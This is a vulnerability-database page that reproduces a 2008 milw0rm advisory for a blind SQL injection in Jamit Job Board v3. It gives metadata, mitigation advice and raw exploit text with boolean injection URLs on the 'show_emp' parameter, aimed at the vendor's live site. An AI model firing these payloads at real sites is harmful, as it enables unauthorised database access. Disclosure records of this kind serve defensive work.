header-logo
Suggest Exploit
vendor:
Jamit Job Board
by:
XaDoS
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Jamit Job Board
Affected Version From: 3
Affected Version To: 3
Patch Exists: No
Related CWE: N/A
CPE: a:jamit:jamit_job_board
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Jamit Job Board v.3 (index.php show_emp) <= Blind $ql Injection

Jamit Job Board v.3 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable parameter 'show_emp' in the 'index.php' page. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitizing user input and using parameterized queries can help prevent this vulnerability.
Source

Exploit-DB raw data:

[â– ]  Jamit Job Board v.3 (index.php show_emp) <= Blind $ql Injection

 
>☻<

> AuToR: XaDoS
> Contact M&: xados [at] hotmail [dot] it
> Site: www.securitycode.it
> B§g: Blind $ql inJection
> SIte vuln: http://www.jamit.com

>☻<
 
 
[â– ] ExPL0iT:
 
|: http://www.example.com/index.php?show_emp=[sql] 
 
 
[■] D£M0: 
 
|: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=4 [NO°°]
 
|: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=5 [y&$] 
 
(l00k at the end of the PaG&)

 
[â– ] Th4nKs:::::>
 
\> Str0ke </\> Thc(MarJuana) </\> WiLLiam S. Burroughs </\> LiLiTh (You Ar& Mi!nE!) </

# milw0rm.com [2008-11-25]